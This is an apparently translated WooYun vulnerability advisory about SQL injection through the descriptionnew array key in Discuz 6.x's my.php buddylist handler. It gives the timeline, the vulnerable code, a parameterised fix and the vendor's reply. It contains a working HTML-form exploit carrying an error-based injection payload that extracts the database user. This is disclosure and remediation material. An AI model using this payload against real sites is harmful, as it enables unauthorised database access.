WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops articles, online browsing--------http://drop.zone.ci/
2014-10-22: Details sent to the vendor, awaiting vendor handling
2014-10-23: Vendor confirmed; details disclosed to the vendor only
2014-10-26: Details opened to third-party security partners
2014-12-17: Details opened to core white hats and experts in the relevant field
2015-01-06: Details opened to intern white hats
2014-12-27: Details opened to ordinary white hats
2015-01-20: Details disclosed to the public
I only tested 6.x; it seems 7.x has already fixed this.
my.php (around line 600):

} elseif($item == 'buddylist') {

    if(!submitcheck('buddysubmit', 1)) {
        $buddylist = array();
        $query = $db->query("SELECT b.*, m.username FROM {$tablepre}buddys b, {$tablepre}members m
            WHERE b.uid='$discuz_uid' AND m.uid=b.buddyid ORDER BY dateline DESC");
        while($buddy = $db->fetch_array($query)) {
            $buddy['dateline'] = gmdate("$dateformat $timeformat", $buddy['dateline'] + $timeoffset * 3600);
            $buddylist[] = $buddy;
        }

    } else {

        $buddyarray = array();
        $query = $db->query("SELECT * FROM {$tablepre}buddys WHERE uid='$discuz_uid'");
        while($buddy = $db->fetch_array($query)) {
            $buddyarray[$buddy['buddyid']] = $buddy;
        }

        if(!empty($delete) && is_array($delete)) {
            $db->query("DELETE FROM {$tablepre}buddys WHERE uid='$discuz_uid' AND buddyid IN ('".implode('\',\'', $delete)."')");
        }

        if(is_array($descriptionnew)) {

            foreach($descriptionnew as $buddyid => $desc) { // no filtering
                if(($desc = cutstr(dhtmlspecialchars($desc), 255)) != addslashes($buddyarray[$buddyid]['description'])) {
                    $db->query("UPDATE {$tablepre}buddys SET description='$desc' WHERE uid='$discuz_uid' AND buddyid='$buddyid'"); // the array key $buddyid is put straight into the query
                }
            }
        }
Here is the exp:
<form method='post' action='http://dz6.0/my.php?item=buddylist'><input type='hidden' value="1111" name="descriptionnew[1' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e,0x5430304C5320474F21,0x7e) limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#]" /><br /><input type='submit' value='buddysubmit' name='buddysubmit' /><br /></form>
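The root cause above is that only the array values of descriptionnew pass through dhtmlspecialchars/cutstr while the array key $buddyid is concatenated into SQL untouched. As an added example (not Discuz's own code), the same update path with the key validated against the user's own buddy list and the UPDATE parameterised; $pdo (a PDO connection) and the function names are assumptions:

```php
<?php
// Added example, not Discuz code. Two independent defences:
//  1. array keys of descriptionnew are untrusted input: keep only canonical
//     positive integers that are also buddyids in $buddyarray, i.e. rows the
//     current user really owns (loaded from the DB as in the original code);
//  2. the UPDATE is a prepared statement, so neither key nor value reaches
//     the SQL text.
function filter_buddy_descriptions(array $descriptionnew, array $buddyarray): array
{
    $clean = array();
    foreach ($descriptionnew as $buddyid => $desc) {
        // PHP keeps a key such as "1' and(...)" as a string; reject anything
        // that is not a plain decimal integer before it is used anywhere.
        if (!preg_match('/^[1-9][0-9]*$/', (string)$buddyid)) {
            continue;
        }
        $buddyid = (int)$buddyid;
        // Only ids present in this user's own buddy list may be updated.
        if (!isset($buddyarray[$buddyid])) {
            continue;
        }
        // Same normalisation as the original (escape, then cut to 255).
        $clean[$buddyid] = mb_substr(htmlspecialchars((string)$desc, ENT_QUOTES, 'UTF-8'), 0, 255);
    }
    return $clean;
}

// $pdo is an assumed PDO connection; $tablepre and $discuz_uid follow Discuz naming.
function update_buddy_descriptions(PDO $pdo, string $tablepre, int $discuz_uid,
                                   array $descriptionnew, array $buddyarray): int
{
    $stmt = $pdo->prepare("UPDATE {$tablepre}buddys SET description = :desc "
                        . "WHERE uid = :uid AND buddyid = :buddyid");
    $changed = 0;
    foreach (filter_buddy_descriptions($descriptionnew, $buddyarray) as $buddyid => $desc) {
        if ($desc === $buddyarray[$buddyid]['description']) {
            continue; // unchanged, skip the write
        }
        $stmt->execute(array(':desc' => $desc, ':uid' => $discuz_uid, ':buddyid' => $buddyid));
        $changed += $stmt->rowCount();
    }
    return $changed;
}
```

With this in place the form in the exp above is simply dropped: its key fails the integer check, and even a numeric key that is not in $buddyarray never reaches the database.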
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2014-10-23 09:03
Thank you for raising this issue, but this version is too old and is no longer maintained. We recommend that sites still running this program upgrade as soon as possible.
None yet